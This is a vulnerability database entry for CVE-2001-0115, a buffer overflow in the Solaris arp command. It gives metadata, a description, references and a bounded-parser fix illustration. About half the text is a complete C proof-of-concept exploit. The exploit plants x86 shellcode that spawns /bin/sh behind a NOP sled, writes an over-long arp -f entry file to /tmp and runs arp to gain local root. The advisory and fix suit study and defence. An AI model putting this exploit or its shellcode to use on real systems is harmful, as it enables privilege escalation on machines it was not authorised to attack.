Solaris arp Command Buffer Overflow Vulnerability

Vulnerability ID: 1106169
Vulnerability type: Buffer overflow
Published: 2001-01-15
Updated: 2005-05-02
CVE ID: CVE-2001-0115
CNNVD ID: CNNVD-200103-044
Platform: Solaris
CVSS score: 7.2
|Vulnerability sources
https://www.exploit-db.com/exploits/250
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200103-044
|Vulnerability details
The arp command in Solaris 7 and earlier contains a buffer overflow. A local user can execute arbitrary commands by supplying an over-long -f argument (an arp entry file with an over-long field).
|Vulnerability exploit (proof of concept)
/*
   arp overflow proof of concept by [email protected]
   shellcode originally written by Cheez Whiz.

                              tested on x86 solaris 7,8beta
   default should work.  if not, arg1 = offset. +- by 100's

   Copyright Security-Focus.com, 11/2000
*/

#include <fcntl.h>    /* open, O_CREAT, O_WRONLY */
#include <stdlib.h>   /* atoi, putenv, system */
#include <string.h>   /* memset, memcpy, strlen */
#include <unistd.h>   /* write, close, unlink */

/* Returns the current stack pointer (x86 only; the value is left in %eax). */
long get_esp() { __asm__("movl %esp,%eax"); }

int main(int ac, char **av)
{
  /* x86 Solaris shellcode; the \x escape sequences were lost in the page's
     rendering and are restored here from the hex pairs that remained. */
  char shell[] =
    "\xeb\x45\x9a\xff\xff\xff\xff\x07\xff"
    "\xc3\x5e\x31\xc0\x89\x46\xb7\x88\x46"
    "\xbc\x88\x46\x07\x89\x46\x0c\x31\xc0"
    "\xb0\x2f\xe8\xe0\xff\xff\xff\x52\x52"
    "\x31\xc0\xb0\xcb\xe8\xd5\xff\xff\xff"
    "\x83\xc4\x08\x31\xc0\x50\x8d\x5e\x08"
    "\x53\x8d\x1e\x89\x5e\x08\x53\xb0\x3b"
    "\xe8\xbe\xff\xff\xff\x83\xc4\x0c\xe8"
    "\xbe\xff\xff\xff\x2f\x62\x69\x6e\x2f"
    "\x73\x68\xff\xff\xff\xff\xff\xff\xff"
    "\xff\xff";

  unsigned long magic = 0x8047b78;       /* value written at offset 52 of the long field */
  unsigned long r = get_esp() + 600;     /* guessed stack address; argv[1] adjusts it */
  unsigned char buf[300];
  int f;

  if (ac == 2)
    r += atoi(av[1]);

  /* One arp -f entry whose trailing field (300 bytes) exceeds arp's buffer. */
  memset(buf,0x61,sizeof(buf));
  memcpy(buf+52,&magic,4);
  memcpy(buf+76,&r,4);

  f = open("/tmp/ypx",O_CREAT|O_WRONLY,0600);
  write(f,"1 2 3 4 ",8);
  write(f,buf,sizeof(buf));
  close(f);

  /* NOP sled followed by the shellcode, handed to arp through the environment.
     As in the original PoC, buf carries no terminating NUL of its own. */
  memset(buf,0x90,sizeof(buf));
  memcpy(buf,"LOL=",4);
  memcpy(buf+(sizeof(buf)-strlen(shell)),shell,strlen(shell));
  putenv((char *)buf);

  system("/usr/sbin/arp -f /tmp/ypx");
  unlink("/tmp/ypx");
  return 0;
}


// milw0rm.com [2001-01-15]
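The PoC above works because a field of an arp -f entry line is copied into a fixed-size stack buffer without a length check. The following is an added illustration, not the page's code and not Solaris's arp source: a bounded parser for "hostname ether_addr [flags ...]" lines, with field limits chosen for the example, that rejects the over-long field the PoC writes instead of copying it.

```c
#include <ctype.h>
#include <string.h>

/* Field bounds chosen for this illustration, not Solaris's actual limits. */
#define HOST_MAX  64
#define ETHER_MAX 17            /* "xx:xx:xx:xx:xx:xx" */
#define FLAGS_MAX 32

struct arp_entry {
    char host[HOST_MAX + 1];
    char ether[ETHER_MAX + 1];
    char flags[FLAGS_MAX + 1];
};

/* Copy one whitespace-delimited token from *p into dst (capacity cap+1).
 * Returns the token length, or -1 if the token is empty or longer than cap.
 * An unbounded sscanf("%s") or strcpy() at this point is the kind of copy
 * that lets a long field in an arp -f file overwrite the stack. */
static int take_token(const char **p, char *dst, size_t cap)
{
    const char *s = *p;
    size_t n = 0;
    while (*s == ' ' || *s == '\t') s++;
    while (s[n] && !isspace((unsigned char)s[n])) n++;
    if (n == 0 || n > cap) return -1;
    memcpy(dst, s, n);
    dst[n] = '\0';
    *p = s + n;
    return (int)n;
}

/* Parse one "hostname ether_addr [flags ...]" line. Returns 0 on success,
 * -1 if a required field is missing or any field exceeds its bound. */
int parse_arp_line(const char *line, struct arp_entry *e)
{
    const char *p = line;
    char tok[FLAGS_MAX + 1];
    memset(e, 0, sizeof *e);
    if (take_token(&p, e->host, HOST_MAX) < 0) return -1;
    if (take_token(&p, e->ether, ETHER_MAX) < 0) return -1;
    while (take_token(&p, tok, FLAGS_MAX) > 0) {   /* space-joined flags */
        size_t need = strlen(e->flags) + strlen(tok) + (e->flags[0] ? 1 : 0);
        if (need > FLAGS_MAX) return -1;
        if (e->flags[0]) strcat(e->flags, " ");
        strcat(e->flags, tok);
    }
    while (*p == ' ' || *p == '\t' || *p == '\n') p++;
    return *p ? -1 : 0;              /* leftover text means an over-long token */
}
```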
|References

Source: BID
Name: 2193
Link: http://www.securityfocus.com/bid/2193
Source: SUN
Name: 00200
Link: http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/200&type=0&nav=sec.sba
Source: BUGTRAQ
Name: 20010112 arp exploit
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=97957435729702&w=2
Source: BUGTRAQ
Name: 20010111 Solaris Arp Vulnerability
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=97934312727101&w=2
Source: XF
Name: solaris-arp-bo(5928)
Link: http://xforce.iss.net/static/5928.php
